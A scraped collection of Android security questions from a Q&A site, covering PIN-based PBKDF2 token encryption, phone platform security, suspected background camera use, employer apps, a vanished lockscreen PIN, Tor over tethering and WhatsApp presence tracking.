Android: How safe is PBKDF2 with a 4 digit pin?

Our Product Manager wants a 4 digit pin for login in our app, obviously for UX reasons, so user don’t have to remember their password each time when they login.

A refresh token can be retrieved from backend to obtain a session token, which have access to the API. On our app, we encrypt the refresh token with AES and PBKDF2. A random salt and IV are generated plus the 4 digit used as password for PBKDF2.

After the encryption, I store the salt, IV and the cipher text base64 encoded in private shared preference.

The encryption code looks like this:

const val CPR_TRANSFORMATION = "AES/CBC/PKCS7Padding" const val ALGORITHM_TYPE = "PBKDF2WithHmacSHA1" const val ITERATION_AMOUNT = 12000 const val KEY_SIZE = 256  private fun encrypt(passCode: String, data: ByteArray): Encrypted { //e.g.: passCode = "0000"     val salt = ByteArray(256)     SecureRandom().nextBytes(salt)      val iv = ByteArray(16)     SecureRandom().nextBytes(iv)      val cipher = Cipher.getInstance(CPR_TRANSFORMATION)     cipher.init(Cipher.ENCRYPT_MODE, getSecretKey(passCode, salt), IvParameterSpec(iv))     val raw = cipher.doFinal(data)     return Encrypted(salt.encodeBase64(), iv.encodeBase64(), raw.encodeBase64()) }  private fun getSecretKey(passCode: String, salt: ByteArray): Key {     val pbKeySpec = PBEKeySpec(passCode.toCharArray(), salt, ITERATION_AMOUNT, KEY_SIZE)     val keyBytes = SecretKeyFactory.getInstance(ALGORITHM_TYPE).generateSecret(pbKeySpec).encoded     return SecretKeySpec(keyBytes, KeyProperties.KEY_ALGORITHM_AES) } 

Now my question is: How secure is this implementation?

  • How could an attacker retrieve the refresh token from shared preference and decrypt it?
  • Is the symmetric key inside secure element?
  • How safe is this implementation against malware or root?
  • How easy can the key be brute forced? (except that user tries 10k times manually to insert the correct pin)

Which smartphone is more secure Iphone or Android?

I need to decide whether or not I will push all of my employees to Apple or Android. Right now we’re about an even split and I’d really like to have them all on one side. It really comes down to which phone is more secure, The new iPhones or new Androids? These phones are only used for email connectivity.

  • What features make one more safe than the other?
  • What vulnerabilities have been seen between these two phones?
  • Which is more security oriented?

How to check if Android app is taking pictures in the background? [migrated]

I have Android app that I found to be loading Camera in the background. It’s one of the most widely used internet browsers.

I been trying debug what is actually happening with LogCat in the Android Device Monitor. Couple of lines that catch my eye:

I/CameraManagerGlobal(24529): getCameraService: Reconnecting to camera service I/CameraService(331): getCameraCharacteristics: Switching to HAL1 shim implementation... I/NuPlayer(331): setDataSourceAsync(URL suppressed) I/CameraClient(331): Opening camera 1 E/QCamera2HWI(331): [KPI Perf] int qcamera::QCamera2HardwareInterface::openCamera(hw_device_t**): E PROFILE_OPEN_CAMERA camera id 1 I/QCameraHalWatchdog(331): Starting Watchdog Thread... E/mm-camera-intf(331): mm_camera_open: dev name = /dev/video2, cam_idx = 2 D/QCameraParameters(331): int32_t qcamera::QCameraParameters::initDefaultParameters(): supported pic sizes: 1280x960,1280x720,640x480,352x288 D/QCameraParameters(331): int32_t qcamera::QCameraParameters::setNumOfSnapshot(): nBurstNum = 1, nExpnum = 1 I/QCameraHalWatchdog(331): Stopped Watchdog Thread... I/CameraClient(331): Destroying camera 1 E/QCameraPostProc(331): int32_t qcamera::QCameraPostProcessor::deinit(): Jpeg closed, rc = 0, mJpegClientHandle = 7900 

How would I know if picture is actually taken?

Is this possibly normal behavior to check camera availability?

3rd party (employer’s) app on android phone – what is the risk for an employee?

An employer (someone’s employer) issued an android app and requests that all of the employees install it. During installation the app requests access to all of the phone’s resources and it wouldn’t work if the access is declined.

The official purpose of the app is sending some internal requests concerning work-related stuff. But, who knows, maybe an employer has some additional goals.

What is the risk for employees when installing such an app on a personal phone? What an employer might see on an employee’s phone? Could it see the employee’s location? What files or personal data can it get access to?

What can an employee do to restrict the employer’s access?

The question is not about using a separate phone. A separate phone for each app is not what the question is about. It is about a 3rd party app on a personal phone.

Android phone’s lockscreen PIN disappeared?

I own a ZTE Axon 7 (model 2017G) that I purchased secondhand from a reputable vendor in Germany ca. 3 years ago. The phone has been working well, and I updated the OS to Android 8.0. manually earlier this year using an official image from ZTE.

A severe case of butterfingers affected me yesterday (and I guess today), and I dropped the phone a couple of times (the phone has never been in use with out this very good TPU case from this company called Spigen). The last of these drops (today) broke the display. No physical damage, but half the screen is "gone"–it looks like the display pictured here in this iFixit thread but with multicolored dots instead of lines.

I wasn’t too worried about this (hopefully it’s just a loose cable), but then I noticed I was only swiping up to get past the lockscreen. Now here’s the thing: I’ve always used this phone with a 4-digit lockscreen PIN. I can confirm–that as recently as yesterday–my partner and I mentioned the PIN because my phone had died (battery ran too low), and they had to enter the PIN after restarting it; so this isn’t my imagination going wild.

As far as I can tell, nothing else has been affected. All the data still seems to be there, and nothing seems to have been "hacked" (I even briefly texted my partner with the broken screen to let them know that the screen is broken).

I went and checked in the settings, and the lockscreen PIN isn’t active there either as far as I can tell (so it doesn’t seem to be some kind of a glitch). I restarted the phone, and it asked for the PIN as it does normally to authorize the SIM. So it appears the lockscreen PIN has been disabled entirely, but it wasn’t me who disabled it.

How is this even possible? Can the phone being dropped at a weird angle disable the lockscreen PIN? (It sounds ridiculous just even typing that.) How can I check for signs of intrusion on the device (with the broken screen)?

Some "events"/facts that may be of relevance(?):

  • The one other question I have on this SE is about legitimate Google 2FA codes arriving from random numbers. This hadn’t happened in a while, but it happened again on 29.06.2020 (this Monday).
  • I always put my phone next to the bed during the night, and I did so last night. The phone was in another room this morning, however. Neither my partner nor I remember moving it. It is plausible that I moved the phone (I have a mild tendency to sleep walk), but I doubt I would have been able to disable the PIN in my sleep.
  • The phone’s storage is not encrypted.

Can one trust OS and apps from Onyx: app store, modified Android, Onyx Cloud

Onyx Boox is a brand of e-book reader produced by Onyx International Inc, based in China. They have e-book readers based on Android OS. They have features that can violate user privacy or other accounts security:

  1. App store with optimized for e-book apps from other App stores: kindle, office, evernote and etc
  2. Account manager: Dropbox, Evernote and etc
  3. Option to enable Google play and other Google services (like Calendar)
  4. Onyx Cloud (sync personal notes and etc)

So the question is: are there any sings of backdoors or vulnerabilities known about their modified apps or OS itself or other stuff that can lead to user data leaks (like privacy leaks or leaks of sensitive information: like passwords or other data)?

[Android APP] Gym Buddy – Find a Gym Partner (3200 Active Accounts)

Selling Android APP
https://play.google.com/store/apps/details?id=com.backbencherslab.gymbuddy

What is included in the sale?

  1. Domain: Gymbuddy.org
  2. Full Source Code as received from Developer for the Android APP
  3. Full Server Side Code

What is required to keep the app operational?

  1. All you need is to pay for the Yearly Domain and Hosting Costs which are upto you.

Why are you selling the app?

  1. I don't…

[Android APP] Gym Buddy – Find a Gym Partner (3200 Active Accounts)

How can I stay safe when I’m visiting potentially harmful websites on Android 9.0+ or similar MIUI?

I mean harmful by the fact that they might have ads, popups or other ways in which they might transfer malware to my phone or exploit vulnerabilities. And by visiting I mean interacting, clicking on items found on them, playing videos on them, like adult sites for an example of such a website.

Is there a sandbox or a VM on such Android phone that might help? Or am I secured if I have a basic antivirus, NoScript and an adblocker? Is there any you would recommend?

What threats Android pose to anonymity when internet is accessed by a laptop through USB tethering but over Tor?

I use USB tethering on an Android 10 mobile to access internet on my laptop. I use Tor browser (TB) on laptop and keep my OS (a Linux distro) on laptop patched for security vulnerabilities. At times I need to consume certain content from websites which I don’t want any intermediary to know about.

Can my mobile device see what data I am requesting and receiving other than that I am connected to a Tor entry node and passing data to it back and forth?

Here’s what I have in mind:

  1. I enter security.stackexchange.com in TB’s URL bar in laptop
  2. TB establishes a secure connection and sends my request to Tor network.
  3. My telecom provider, the first potentially hostile intermediary I usually think of can see only that I am connected to Tor network. For scope reduction of this question, let us become ignorant and assume that my ISP or any intermediary further down does not have the capability to either see my original request or link it back to me.

So far, reasonably good. But, the first intermediary seems to be the Android 10 device itself. How can I be sure that my Android 10 device cannot know what data I am requesting and receiving other than that I am connected to Tor?

I am concerned because my mobile device is potentially hostile in my eyes. I do not know the capabilities of the baseband OS (which some state sponsored entities may exploit), don’t know the vulnerabilities of my Android 10 device which has vanilla Android fused with proprietary code. My mobile device is also at the mercy of its OEM which may not provide security updates for it in future.

How can an Android app like Whatslog detect user online status from Whatsapp?

Whatslog on Android allows you to check the online status of whatsapp users. You don’t need to scan a whatsapp qrcode, you just have to enter a phone number and it works pretty well.

I don’t understand how they do it.

  • I’m pretty sure they don’t use web.whatsapp.com because they don’t ask any QR code furthermore I have reverse-engineered the apk to java with jadx and I don’t see any trace of them using any “hidden” whatsapp api or anything like that.

  • I don’t see any communication between Whatslog and Whatsapp through Android Intents or the like.

There is this question which discusses the same thing but the answers talk about web.whatsapp but I’m pretty sure it’s not what they use : How can application like Whatsdog detect user online status from Whatsapp?